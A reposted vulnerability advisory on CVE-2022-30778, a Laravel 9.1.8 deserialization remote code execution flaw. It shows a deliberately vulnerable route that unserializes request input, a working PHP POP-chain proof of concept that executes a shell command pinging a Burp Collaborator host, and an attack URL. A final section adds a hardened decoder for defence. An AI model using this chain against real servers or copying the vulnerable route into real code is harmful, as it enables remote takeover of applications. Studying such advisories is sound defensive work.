[Unknown] Laravel 9.1.8 Deserialization and Remote Code Execution

admin, May 16, 2022, 20:16:11

01
Vulnerability Description


Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows remote code execution via an unserialize POP chain in __destruct in Illuminate\Broadcasting\PendingBroadcast.php and dispatch($command) in Illuminate\Bus\QueueingDispatcher.php.


02
Vulnerability Status

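#  Vulnerability status    Description
1  Vulnerability details
2  Vulnerability type      Code execution
3  Severity                Unknown
4  Exploited in the wild   Unknown
5  EXP                     Unknown
6  POC
7  CVE ID                  CVE-2022-30778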


03
References


  • https://github.com/1nhann/vulns/issues/1



04
Older Vulnerabilities



05
Affected Versions


  • Laravel 9.1.8


06
Vulnerability Analysis


Set up a test route:

routes/web.php:

<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

// Deliberately vulnerable test route: request input goes straight to unserialize().
Route::get('/', function (\Illuminate\Http\Request $request) {
//    return view('welcome');
    $ser = base64_decode($request->input("ser"));
    unserialize($ser);
    return "ok";
});

PoC

<?php
namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\Bus{
    // Stub of the dispatcher whose dispatch($command) is named in the description.
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct(){
            $this->queueResolver = "system";
        }
    }
}

namespace Illuminate\Broadcasting{
    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function __construct(){
        }
    }

    // Stub of the class whose __destruct starts the chain.
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct(){
            $this->event = new BroadcastEvent();
            $this->event->connection = "ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}

namespace{
    // Print the serialized object, base64-encoded for the ser parameter.
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

Result: the script prints the base64-encoded serialized payload.

Attack

http://127.0.0.1:1080/?ser=[base64 payload from the PoC output]
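
The test route above passes request input straight to unserialize(), which is what allows a destructor such as PendingBroadcast's to run. As an added example (not from the original article or from Laravel), the code below contrasts that pattern with a decoder that uses unserialize()'s allowed_classes option and rejects any object; DemoGadget, contains_object and decode_untrusted are hypothetical names, and both payloads are constructed.

```php
<?php
// Constructed stand-in for a gadget class: its destructor only counts calls.
final class DemoGadget
{
    public static int $destructed = 0;
    public string $cmd = 'noop';
    public function __destruct() { self::$destructed++; }
}

// True if $v is, or contains, an object (including __PHP_Incomplete_Class).
function contains_object(mixed $v): bool
{
    if (is_array($v)) {
        return (bool) array_filter($v, 'contains_object');
    }
    return is_object($v);
}

// Hypothetical hardened replacement for unserialize(base64_decode($input)).
function decode_untrusted(string $b64): mixed
{
    $raw = base64_decode($b64, true);           // strict mode rejects non-base64 input
    if ($raw === false) {
        throw new InvalidArgumentException('not base64');
    }
    // allowed_classes => false: no application class is instantiated,
    // so no __wakeup() or __destruct() of a gadget can run.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (($value === false && $raw !== 'b:0;') || contains_object($value)) {
        throw new InvalidArgumentException('rejected serialized input');
    }
    return $value;
}

// Constructed sample inputs.
$objectPayload = base64_encode('O:10:"DemoGadget":1:{s:3:"cmd";s:4:"noop";}');
$plainPayload  = base64_encode(serialize(['page' => 2, 'sort' => 'name']));

unserialize(base64_decode($objectPayload));     // the route's pattern: object built, then destroyed
echo 'destructor calls, plain unserialize: ', DemoGadget::$destructed, PHP_EOL;
try {
    decode_untrusted($objectPayload);
} catch (InvalidArgumentException $e) {
    echo 'hardened decoder: ', $e->getMessage(), PHP_EOL;
}
echo 'destructor calls, hardened decoder: ', DemoGadget::$destructed, PHP_EOL;
var_dump(decode_untrusted($plainPayload));
```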


Originally published on the WeChat official account Ots安全 (Ots Security): [Unknown] Laravel 9.1.8 Deserialization and Remote Code Execution

  • When reposting, please keep the link to this article (CN-SEC中文网; thanks to the original author for their hard work): http://cn-sec.com/archives/1011867.html
